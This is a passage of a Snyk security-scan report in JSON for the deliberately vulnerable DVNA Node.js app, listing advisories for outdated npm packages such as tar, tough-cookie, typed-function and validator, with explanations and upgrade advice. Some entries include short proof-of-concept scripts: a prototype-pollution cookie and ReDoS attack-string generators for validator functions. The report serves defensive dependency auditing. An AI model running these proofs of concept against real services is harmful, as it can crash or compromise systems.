"cvssv3_baseScore": 8.2, + "security-severity": "8.2" + } + }, + { + "id": "SNYK-JS-TAR-1536758", + "shortDescription": { + "text": "Low severity - Regular Expression Denial of Service (ReDoS) vulnerability in tar" + }, + "fullDescription": { + "text": "tar@2.2.2" + }, + "help": { + "text": "", + "markdown": "* Package Manager: npm\n* Vulnerable module: tar\n* Introduced through: dvna@0.0.1, bcrypt@1.0.3 and others\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › bcrypt@1.0.3 › node-pre-gyp@0.6.36 › tar@2.2.2\n* _Introduced through_: dvna@0.0.1 › bcrypt@1.0.3 › node-pre-gyp@0.6.36 › tar-pack@3.4.1 › tar@2.2.2\n# Overview\n[tar](https://www.npmjs.com/package/tar) is a full-featured Tar for Node.js.\n\nAffected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). When stripping the trailing slash from `files` arguments, the `f.replace(/\\/+$/, '')` performance of this function can exponentially degrade when `f` contains many `/` characters resulting in ReDoS. \r\n\r\nThis vulnerability is not likely to be exploitable as it requires that the untrusted input is being passed into the `tar.extract()` or `tar.list()` array of entries to parse/extract, which would be unusual.\n\n# Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.\n\nThe Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.\n\nLet’s take the following regular expression as an example:\n```js\nregex = /A(B|C+)+D/\n```\n\nThis regular expression accomplishes the following:\n- `A` The string must start with the letter 'A'\n- `(B|C+)+` The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the `+` matches one or more times). The `+` at the end of this section states that we can look for one or more matches of this section.\n- `D` Finally, we ensure this section of the string ends with a 'D'\n\nThe expression would match inputs such as `ABBD`, `ABCCCCD`, `ABCBCCCD` and `ACCCCCD`\n\nIt most cases, it doesn't take very long for a regex engine to find a match:\n\n```bash\n$ time node -e '/A(B|C+)+D/.test(\"ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD\")'\n0.04s user 0.01s system 95% cpu 0.052 total\n\n$ time node -e '/A(B|C+)+D/.test(\"ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX\")'\n1.79s user 0.02s system 99% cpu 1.812 total\n```\n\nThe entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.\n\nMost Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as _catastrophic backtracking_.\n\nLet's look at how our expression runs into this problem, using a shorter string: \"ACCCX\". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:\n1. CCC\n2. CC+C\n3. C+CC\n4. C+C+C.\n\nThe engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use [RegEx 101 debugger](https://regex101.com/debugger) to see the engine has to take a total of 38 steps before it can determine the string doesn't match.\n\nFrom there, the number of steps the engine must use to validate a string just continues to grow.\n\n| String | Number of C's | Number of steps |\n| -------|-------------:| -----:|\n| ACCCX | 3 | 38\n| ACCCCX | 4 | 71\n| ACCCCCX | 5 | 136\n| ACCCCCCCCCCCCCCX | 14 | 65,553\n\n\nBy the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.\n\n# Remediation\nUpgrade `tar` to version 6.1.4, 5.0.8, 4.4.16 or higher.\n# References\n- [GitHub Commit](https://github.com/npm/node-tar/commit/06cbde5935aa7643f578f874de84a7da2a74fe3a)\n- [GitHub Commit](https://github.com/npm/node-tar/commit/adf35115dbc6e7a479fe3c38f859baf6ffff7a7a)\n- [GitHub Commit](https://github.com/npm/node-tar/commit/d3d5a4e4560f18131e64fc62f5a281b238ef2ecf)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-400", + "npm" + ], + "cvssv3_baseScore": 3.7, + "security-severity": "3.7" + } + }, + { + "id": "SNYK-JS-TAR-1579147", + "shortDescription": { + "text": "High severity - Arbitrary File Write vulnerability in tar" + }, + "fullDescription": { + "text": "(CVE-2021-37701) tar@2.2.2" + }, + "help": { + "text": "", + "markdown": "* Package Manager: npm\n* Vulnerable module: tar\n* Introduced through: dvna@0.0.1, bcrypt@1.0.3 and others\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › bcrypt@1.0.3 › node-pre-gyp@0.6.36 › tar@2.2.2\n* _Introduced through_: dvna@0.0.1 › bcrypt@1.0.3 › node-pre-gyp@0.6.36 › tar-pack@3.4.1 › tar@2.2.2\n# Overview\n[tar](https://www.npmjs.com/package/tar) is a full-featured Tar for Node.js.\n\nAffected versions of this package are vulnerable to Arbitrary File Write. `node-tar` aims to guarantee that any file whose location would be modified by a symbolic link is not extracted. This is, in part, achieved by ensuring that extracted directories are not symlinks. Additionally, in order to prevent unnecessary stat calls to determine whether a given path is a directory, paths are cached when directories are created.\r\n\r\nThis logic was insufficient when extracting `tar` files that contained both a directory and a symlink with the same name as the directory, where the symlink and directory names in the archive entry used backslashes as a path separator on posix systems. The cache checking logic used both `\\` and `/` characters as path separators. However, `\\` is a valid filename character on posix systems.\r\n\r\nBy first creating a directory, and then replacing that directory with a symlink, it is possible to bypass `node-tar` symlink checks on directories, essentially allowing an untrusted `tar` file to symlink into an arbitrary location. This can lead to extracting arbitrary files into that location, thus allowing arbitrary file creation and overwrite.\r\n\r\nAdditionally, a similar confusion could arise on case-insensitive filesystems. If a `tar` archive contained a directory at `FOO`, followed by a symbolic link named `foo`, then on case-insensitive file systems, the creation of the symbolic link would remove the directory from the filesystem, but not from the internal directory cache, as it would not be treated as a cache hit. A subsequent file entry within the `FOO` directory would then be placed in the target of the symbolic link, thinking that the directory had already been created.\n# Remediation\nUpgrade `tar` to version 6.1.7, 5.0.8, 4.4.16 or higher.\n# References\n- [GitHub Commit](https://github.com/npm/node-tar/commit/53602669f58ddbeb3294d7196b3320aaaed22728)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-22", + "npm" + ], + "cvssv3_baseScore": 8.5, + "security-severity": "8.5" + } + }, + { + "id": "SNYK-JS-TAR-1579152", + "shortDescription": { + "text": "High severity - Arbitrary File Write vulnerability in tar" + }, + "fullDescription": { + "text": "(CVE-2021-37712) tar@2.2.2" + }, + "help": { + "text": "", + "markdown": "* Package Manager: npm\n* Vulnerable module: tar\n* Introduced through: dvna@0.0.1, bcrypt@1.0.3 and others\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › bcrypt@1.0.3 › node-pre-gyp@0.6.36 › tar@2.2.2\n* _Introduced through_: dvna@0.0.1 › bcrypt@1.0.3 › node-pre-gyp@0.6.36 › tar-pack@3.4.1 › tar@2.2.2\n# Overview\n[tar](https://www.npmjs.com/package/tar) is a full-featured Tar for Node.js.\n\nAffected versions of this package are vulnerable to Arbitrary File Write. `node-tar` aims to guarantee that any file whose location would be modified by a symbolic link is not extracted. This is, in part, achieved by ensuring that extracted directories are not symlinks. Additionally, in order to prevent unnecessary stat calls to determine whether a given path is a directory, paths are cached when directories are created.\r\n\r\nThis logic is insufficient when extracting `tar` files that contain two directories and a symlink with names containing unicode values that normalized to the same value. Additionally, on Windows systems, long path portions would resolve to the same file system entities as their 8.3 \"short path\" counterparts.\r\nA specially crafted `tar` archive can include directories with two forms of the path that resolve to the same file system entity, followed by a symbolic link with a name in the first form, lastly followed by a file using the second form. This leads to bypassing `node-tar` symlink checks on directories, essentially allowing an untrusted `tar` file to symlink into an arbitrary location and extracting arbitrary files into that location.\n# Remediation\nUpgrade `tar` to version 6.1.9, 5.0.10, 4.4.18 or higher.\n# References\n- [GitHub Commit](https://github.com/npm/node-tar/commit/b6162c7fafe797f856564ef37f4b82747f051455)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-22", + "npm" + ], + "cvssv3_baseScore": 8.5, + "security-severity": "8.5" + } + }, + { + "id": "SNYK-JS-TAR-1579155", + "shortDescription": { + "text": "High severity - Arbitrary File Write vulnerability in tar" + }, + "fullDescription": { + "text": "(CVE-2021-37713) tar@2.2.2" + }, + "help": { + "text": "", + "markdown": "* Package Manager: npm\n* Vulnerable module: tar\n* Introduced through: dvna@0.0.1, bcrypt@1.0.3 and others\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › bcrypt@1.0.3 › node-pre-gyp@0.6.36 › tar@2.2.2\n* _Introduced through_: dvna@0.0.1 › bcrypt@1.0.3 › node-pre-gyp@0.6.36 › tar-pack@3.4.1 › tar@2.2.2\n# Overview\n[tar](https://www.npmjs.com/package/tar) is a full-featured Tar for Node.js.\n\nAffected versions of this package are vulnerable to Arbitrary File Write. `node-tar` aims to guarantee that any file whose location would be outside of the extraction target directory is not extracted. This is, in part, accomplished by sanitizing absolute paths of entries within the archive, skipping archive entries that contain `..` path portions, and resolving the sanitized paths against the extraction target directory.\r\n\r\nThis logic is insufficient on Windows systems when extracting `tar` files that contain a path that is not an absolute path, but specify a drive letter different from the extraction target, such as `C:some\\path`. If the drive letter does not match the extraction target, for example `D:\\extraction\\dir`, then the result of `path.resolve(extractionDirectory, entryPath)` resolves against the current working directory on the `C:` drive, rather than the extraction target directory.\r\n\r\nAdditionally, a `..` portion of the path can occur immediately after the drive letter, such as `C:../foo`, and is not properly sanitized by the logic that checks for `..` within the normalized and split portions of the path.\r\n\r\n**Note:** This only affects users of `node-tar` on Windows systems.\n# Remediation\nUpgrade `tar` to version 6.1.9, 5.0.10, 4.4.18 or higher.\n# References\n- [GitHub Commit](https://github.com/npm/node-tar/commit/875a37e3ec031186fc6599f6807341f56c584598)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-22", + "npm" + ], + "cvssv3_baseScore": 8.5, + "security-severity": "8.5" + } + }, + { + "id": "SNYK-JS-TAR-6476909", + "shortDescription": { + "text": "Medium severity - Uncontrolled Resource Consumption ('Resource Exhaustion') vulnerability in tar" + }, + "fullDescription": { + "text": "(CVE-2024-28863) tar@2.2.2" + }, + "help": { + "text": "", + "markdown": "* Package Manager: npm\n* Vulnerable module: tar\n* Introduced through: dvna@0.0.1, bcrypt@1.0.3 and others\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › bcrypt@1.0.3 › node-pre-gyp@0.6.36 › tar@2.2.2\n* _Introduced through_: dvna@0.0.1 › bcrypt@1.0.3 › node-pre-gyp@0.6.36 › tar-pack@3.4.1 › tar@2.2.2\n# Overview\n[tar](https://www.npmjs.com/package/tar) is a full-featured Tar for Node.js.\n\nAffected versions of this package are vulnerable to Uncontrolled Resource Consumption ('Resource Exhaustion') due to the lack of folders count validation during the folder creation process. An attacker who generates a large number of sub-folders can consume memory on the system running the software and even crash the client within few seconds of running it using a path with too many sub-folders inside.\n# Remediation\nUpgrade `tar` to version 6.2.1 or higher.\n# References\n- [GitHub Commit](https://github.com/isaacs/node-tar/commit/fe8cd57da5686f8695415414bda49206a545f7f7)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-400", + "npm" + ], + "cvssv3_baseScore": 6.5, + "security-severity": "6.5" + } + }, + { + "id": "SNYK-JS-TOUGHCOOKIE-5672873", + "shortDescription": { + "text": "Medium severity - Prototype Pollution vulnerability in tough-cookie" + }, + "fullDescription": { + "text": "(CVE-2023-26136) tough-cookie@2.5.0" + }, + "help": { + "text": "", + "markdown": "* Package Manager: npm\n* Vulnerable module: tough-cookie\n* Introduced through: dvna@0.0.1, bcrypt@1.0.3 and others\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › bcrypt@1.0.3 › node-pre-gyp@0.6.36 › request@2.88.2 › tough-cookie@2.5.0\n# Overview\n[tough-cookie](https://www.npmjs.com/package/tough-cookie) is a RFC6265 Cookies and CookieJar module for Node.js.\n\nAffected versions of this package are vulnerable to Prototype Pollution due to improper handling of Cookies when using CookieJar in `rejectPublicSuffixes=false` mode. Due to an issue with the manner in which the objects are initialized, an attacker can expose or modify a limited amount of property information on those objects. There is no impact to availability.\n# PoC\n```\r\n// PoC.js\r\nasync function main(){\r\nvar tough = require(\"tough-cookie\");\r\nvar cookiejar = new tough.CookieJar(undefined,{rejectPublicSuffixes:false});\r\n// Exploit cookie\r\nawait cookiejar.setCookie(\r\n \"Slonser=polluted; Domain=__proto__; Path=/notauth\",\r\n \"https://__proto__/admin\"\r\n);\r\n// normal cookie\r\nvar cookie = await cookiejar.setCookie(\r\n \"Auth=Lol; Domain=google.com; Path=/notauth\",\r\n \"https://google.com/\"\r\n);\r\n\r\n//Exploit cookie\r\nvar a = {};\r\nconsole.log(a[\"/notauth\"][\"Slonser\"])\r\n}\r\nmain();\r\n```\n\n# Details\n\nPrototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as `__proto__`, `constructor` and `prototype`. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the `Object.prototype` are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.\n\nThere are two main ways in which the pollution of prototypes occurs:\n\n- Unsafe `Object` recursive merge\n \n- Property definition by path\n \n\n## Unsafe Object recursive merge\n\nThe logic of a vulnerable recursive merge function follows the following high-level model:\n```\nmerge (target, source)\n\n foreach property of source\n\n if property exists and is an object on both the target and the source\n\n merge(target[property], source[property])\n\n else\n\n target[property] = source[property]\n```\n
\n\nWhen the source object contains a property named `__proto__` defined with `Object.defineProperty()` , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of `Object` and the source of `Object` as defined by the attacker. Properties are then copied on the `Object` prototype.\n\nClone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: `merge({},source)`.\n\n`lodash` and `Hoek` are examples of libraries susceptible to recursive merge attacks.\n\n## Property definition by path\n\nThere are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: `theFunction(object, path, value)`\n\nIf the attacker can control the value of “pathâ€, they can set this value to `__proto__.myValue`. `myValue` is then assigned to the prototype of the class of the object.\n\n# Types of attacks\n\nThere are a few methods by which Prototype Pollution can be manipulated:\n\n| Type |Origin |Short description |\n|--|--|--|\n| **Denial of service (DoS)**|Client |This is the most likely attack.
DoS occurs when `Object` holds generic functions that are implicitly called for various operations (for example, `toString` and `valueOf`).
The attacker pollutes `Object.prototype.someattr` and alters its state to an unexpected value such as `Int` or `Object`. In this case, the code fails and is likely to cause a denial of service.
**For example:** if an attacker pollutes `Object.prototype.toString` by defining it as an integer, if the codebase at any point was reliant on `someobject.toString()` it would fail. |\n |**Remote Code Execution**|Client|Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation.
**For example:** `eval(someobject.someattr)`. In this case, if the attacker pollutes `Object.prototype.someattr` they are likely to be able to leverage this in order to execute code.|\n|**Property Injection**|Client|The attacker pollutes properties that the codebase relies on for their informative value, including security properties such as cookies or tokens.
**For example:** if a codebase checks privileges for `someuser.isAdmin`, then when the attacker pollutes `Object.prototype.isAdmin` and sets it to equal `true`, they can then achieve admin privileges.|\n\n# Affected environments\n\nThe following environments are susceptible to a Prototype Pollution attack:\n\n- Application server\n \n- Web server\n\n- Web browser\n \n\n# How to prevent\n\n1. Freeze the prototype— use `Object.freeze (Object.prototype)`.\n \n2. Require schema validation of JSON input.\n \n3. Avoid using unsafe recursive merge functions.\n \n4. Consider using objects without prototypes (for example, `Object.create(null)`), breaking the prototype chain and preventing pollution.\n \n5. As a best practice use `Map` instead of `Object`.\n\n## For more information on this vulnerability type:\n\n[Arteau, Oliver. “JavaScript prototype pollution attack in NodeJS application.†GitHub, 26 May 2018](https://github.com/HoLyVieR/prototype-pollution-nsec18/blob/master/paper/JavaScript_prototype_pollution_attack_in_NodeJS.pdf)\n\n# Remediation\nUpgrade `tough-cookie` to version 4.1.3 or higher.\n# References\n- [GitHub Commit](https://github.com/salesforce/tough-cookie/commit/12d474791bb856004e858fdb1c47b7608d09cf6e)\n- [GitHub Issue](https://github.com/salesforce/tough-cookie/issues/282)\n- [GitHub Release](https://github.com/salesforce/tough-cookie/releases/tag/v4.1.3)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-1321", + "npm" + ], + "cvssv3_baseScore": 6.5, + "security-severity": "6.5" + } + }, + { + "id": "SNYK-JS-TYPEDFUNCTION-174139", + "shortDescription": { + "text": "High severity - Arbitrary Code Execution vulnerability in typed-function" + }, + "fullDescription": { + "text": "(CVE-2017-1001004) typed-function@0.10.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: npm\n* Vulnerable module: typed-function\n* Introduced through: dvna@0.0.1, mathjs@3.10.1 and others\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › mathjs@3.10.1 › typed-function@0.10.5\n# Overview\n[typed-function](https://github.com/josdejong/typed-function) is a library used for type checking of JavaScript functions.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution due to the creation of a typed function with JavaScript code in the `_name` variable.\n# Remediation\nUpgrade `typed-function` to version 0.10.6 or higher.\n# References\n- [GitHub Commit](https://github.com/josdejong/typed-function/commit/6478ef4f2c3f3c2d9f2c820e2db4b4ba3425e6fe)\n- [NPM Security Advisory](https://www.npmjs.com/advisories/819)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-94", + "npm" + ], + "cvssv3_baseScore": 8.8, + "security-severity": "8.8" + } + }, + { + "id": "SNYK-JS-VALIDATOR-1090599", + "shortDescription": { + "text": "Medium severity - Regular Expression Denial of Service (ReDoS) vulnerability in validator" + }, + "fullDescription": { + "text": "validator@10.11.0" + }, + "help": { + "text": "", + "markdown": "* Package Manager: npm\n* Vulnerable module: validator\n* Introduced through: dvna@0.0.1, sequelize@4.44.4 and others\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › sequelize@4.44.4 › validator@10.11.0\n# Overview\n[validator](https://www.npmjs.com/package/validator) is a library of string validators and sanitizers.\n\nAffected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via the `isSlug` function\r\n\r\n## PoC\r\n```\r\nvar validator = require(\"validator\")\r\nfunction build_attack(n) {\r\n\tvar ret = \"111\"\r\n\tfor (var i = 0; i < n; i++) {\r\n\t\tret += \"a\"\r\n\t}\r\n\r\n\treturn ret+\"_\";\r\n}\r\nfor(var i = 1; i <= 50000; i++) {\r\n if (i % 10000 == 0) {\r\n var time = Date.now();\r\n var attack_str = build_attack(i)\r\n validator.isSlug(attack_str)\r\n var time_cost = Date.now() - time;\r\n console.log(\"attack_str.length: \" + attack_str.length + \": \" + time_cost+\" ms\")\r\n }\r\n}\r\n```\n\n# Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.\n\nThe Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.\n\nLet’s take the following regular expression as an example:\n```js\nregex = /A(B|C+)+D/\n```\n\nThis regular expression accomplishes the following:\n- `A` The string must start with the letter 'A'\n- `(B|C+)+` The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the `+` matches one or more times). The `+` at the end of this section states that we can look for one or more matches of this section.\n- `D` Finally, we ensure this section of the string ends with a 'D'\n\nThe expression would match inputs such as `ABBD`, `ABCCCCD`, `ABCBCCCD` and `ACCCCCD`\n\nIt most cases, it doesn't take very long for a regex engine to find a match:\n\n```bash\n$ time node -e '/A(B|C+)+D/.test(\"ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD\")'\n0.04s user 0.01s system 95% cpu 0.052 total\n\n$ time node -e '/A(B|C+)+D/.test(\"ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX\")'\n1.79s user 0.02s system 99% cpu 1.812 total\n```\n\nThe entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.\n\nMost Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as _catastrophic backtracking_.\n\nLet's look at how our expression runs into this problem, using a shorter string: \"ACCCX\". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:\n1. CCC\n2. CC+C\n3. C+CC\n4. C+C+C.\n\nThe engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use [RegEx 101 debugger](https://regex101.com/debugger) to see the engine has to take a total of 38 steps before it can determine the string doesn't match.\n\nFrom there, the number of steps the engine must use to validate a string just continues to grow.\n\n| String | Number of C's | Number of steps |\n| -------|-------------:| -----:|\n| ACCCX | 3 | 38\n| ACCCCX | 4 | 71\n| ACCCCCX | 5 | 136\n| ACCCCCCCCCCCCCCX | 14 | 65,553\n\n\nBy the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.\n\n# Remediation\nUpgrade `validator` to version 13.6.0 or higher.\n# References\n- [GitHub Commit](https://github.com/tux-tn/validator.js/commit/b21879cf45c05ee11b2d79e612b651bf7b2d93b7#diff-f41087599986e29c3c0dc15b62f1bf96d8aba16fe41f3730e315c84c2c4cb311)\n- [GitHub Issue](https://github.com/validatorjs/validator.js/issues/1596)\n- [GitHubPR - Actual fix](https://github.com/validatorjs/validator.js/pull/1738)\n- [GitHub PR - Initial fix](https://github.com/validatorjs/validator.js/pull/1603)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-400", + "npm" + ], + "cvssv3_baseScore": 5.3, + "security-severity": "5.3" + } + }, + { + "id": "SNYK-JS-VALIDATOR-1090601", + "shortDescription": { + "text": "Medium severity - Regular Expression Denial of Service (ReDoS) vulnerability in validator" + }, + "fullDescription": { + "text": "validator@10.11.0" + }, + "help": { + "text": "", + "markdown": "* Package Manager: npm\n* Vulnerable module: validator\n* Introduced through: dvna@0.0.1, sequelize@4.44.4 and others\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › sequelize@4.44.4 › validator@10.11.0\n# Overview\n[validator](https://www.npmjs.com/package/validator) is a library of string validators and sanitizers.\n\nAffected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via the `isHSL` function.\r\n\r\n## PoC\r\n```\r\nvar validator = require(\"validator\")\r\nfunction build_attack(n) {\r\n\tvar ret = \"hsla(0\"\r\n\tfor (var i = 0; i < n; i++) {\r\n\t\tret += \" \"\r\n\t}\r\n\r\n\treturn ret+\"◎\";\r\n}\r\nfor(var i = 1; i <= 50000; i++) {\r\n if (i % 1000 == 0) {\r\n var time = Date.now();\r\n var attack_str = build_attack(i)\r\n validator.isHSL(attack_str)\r\n var time_cost = Date.now() - time;\r\n console.log(\"attack_str.length: \" + attack_str.length + \": \" + time_cost+\" ms\")\r\n }\r\n}\r\n\r\n```\n\n# Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.\n\nThe Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.\n\nLet’s take the following regular expression as an example:\n```js\nregex = /A(B|C+)+D/\n```\n\nThis regular expression accomplishes the following:\n- `A` The string must start with the letter 'A'\n- `(B|C+)+` The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the `+` matches one or more times). The `+` at the end of this section states that we can look for one or more matches of this section.\n- `D` Finally, we ensure this section of the string ends with a 'D'\n\nThe expression would match inputs such as `ABBD`, `ABCCCCD`, `ABCBCCCD` and `ACCCCCD`\n\nIt most cases, it doesn't take very long for a regex engine to find a match:\n\n```bash\n$ time node -e '/A(B|C+)+D/.test(\"ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD\")'\n0.04s user 0.01s system 95% cpu 0.052 total\n\n$ time node -e '/A(B|C+)+D/.test(\"ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX\")'\n1.79s user 0.02s system 99% cpu 1.812 total\n```\n\nThe entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.\n\nMost Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as _catastrophic backtracking_.\n\nLet's look at how our expression runs into this problem, using a shorter string: \"ACCCX\". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:\n1. CCC\n2. CC+C\n3. C+CC\n4. C+C+C.\n\nThe engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use [RegEx 101 debugger](https://regex101.com/debugger) to see the engine has to take a total of 38 steps before it can determine the string doesn't match.\n\nFrom there, the number of steps the engine must use to validate a string just continues to grow.\n\n| String | Number of C's | Number of steps |\n| -------|-------------:| -----:|\n| ACCCX | 3 | 38\n| ACCCCX | 4 | 71\n| ACCCCCX | 5 | 136\n| ACCCCCCCCCCCCCCX | 14 | 65,553\n\n\nBy the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.\n\n# Remediation\nUpgrade `validator` to version 13.6.0 or higher.\n# References\n- [GitHub Issue](https://github.com/validatorjs/validator.js/issues/1598)\n- [GitHub PR](https://github.com/validatorjs/validator.js/pull/1651)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-400", + "npm" + ], + "cvssv3_baseScore": 5.3, + "security-severity": "5.3" + } + }, + { + "id": "SNYK-JS-VALIDATOR-1090602", + "shortDescription": { + "text": "Medium severity - Regular Expression Denial of Service (ReDoS) vulnerability in validator" + }, + "fullDescription": { + "text": "validator@10.11.0" + }, + "help": { + "text": "", + "markdown": "* Package Manager: npm\n* Vulnerable module: validator\n* Introduced through: dvna@0.0.1, sequelize@4.44.4 and others\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › sequelize@4.44.4 › validator@10.11.0\n# Overview\n[validator](https://www.npmjs.com/package/validator) is a library of string validators and sanitizers.\n\nAffected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via the `isEmail` function.\r\n\r\n## PoC\r\n```\r\nvar validator = require(\"validator\")\r\nfunction build_attack(n) {\r\n\tvar ret = \"\"\r\n\tfor (var i = 0; i < n; i++) {\r\n\t\tret += \"<\"\r\n\t}\r\n\r\n\treturn ret+\"\";\r\n}\r\nfor(var i = 1; i <= 50000; i++) {\r\n if (i % 10000 == 0) {\r\n var time = Date.now();\r\n var attack_str = build_attack(i)\r\n validator.isEmail(attack_str,{ allow_display_name: true })\r\n var time_cost = Date.now() - time;\r\n console.log(\"attack_str.length: \" + attack_str.length + \": \" + time_cost+\" ms\")\r\n }\r\n}\r\n```\n\n# Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.\n\nThe Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.\n\nLet’s take the following regular expression as an example:\n```js\nregex = /A(B|C+)+D/\n```\n\nThis regular expression accomplishes the following:\n- `A` The string must start with the letter 'A'\n- `(B|C+)+` The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the `+` matches one or more times). The `+` at the end of this section states that we can look for one or more matches of this section.\n- `D` Finally, we ensure this section of the string ends with a 'D'\n\nThe expression would match inputs such as `ABBD`, `ABCCCCD`, `ABCBCCCD` and `ACCCCCD`\n\nIt most cases, it doesn't take very long for a regex engine to find a match:\n\n```bash\n$ time node -e '/A(B|C+)+D/.test(\"ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD\")'\n0.04s user 0.01s system 95% cpu 0.052 total\n\n$ time node -e '/A(B|C+)+D/.test(\"ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX\")'\n1.79s user 0.02s system 99% cpu 1.812 total\n```\n\nThe entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long 